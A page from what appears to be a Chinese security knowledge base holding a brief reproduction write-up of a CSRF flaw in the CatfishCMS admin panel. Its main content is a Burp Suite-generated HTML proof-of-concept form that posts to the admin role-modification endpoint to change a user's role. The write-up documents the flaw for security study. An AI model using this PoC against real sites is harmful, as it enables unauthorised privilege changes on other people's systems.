menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right CatfishCMS后台csrf chevron_right CatfishCMS后台csrf.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    CatfishCMS后台csrf.md
    795 B / 2021-07-15 19:49:17
        CatfishCMS后台csrf
    ==================
    
    一、漏洞简介
    ------------
    
    二、漏洞影响
    ------------
    
    三、复现过程
    ------------
    
    首先需要登录后台
    
        <html>
          <!-- CSRF PoC - generated by Burp Suite Professional -->
          <body>
          <script>history.pushState('', '', '/')</script>
          <form action="http://0-sec.org/index.php/admin/index/modifymanage.html?c=73" method="POST">
              <input type="hidden" name="uid" value="73" />
              <input type="hidden" name="juese" value="3" />
              <input type="hidden" name="verification" value="05f176843c20e12c1364e80b9869ac17" />
              <input type="submit" value="Submit request" />
            </form>
          </body>
        </html>
    
    修改前
    
    ![](./resource/CatfishCMS后台csrf/media/rId24.png)
    
    修改后
    
    image
    
    
    links
    file_download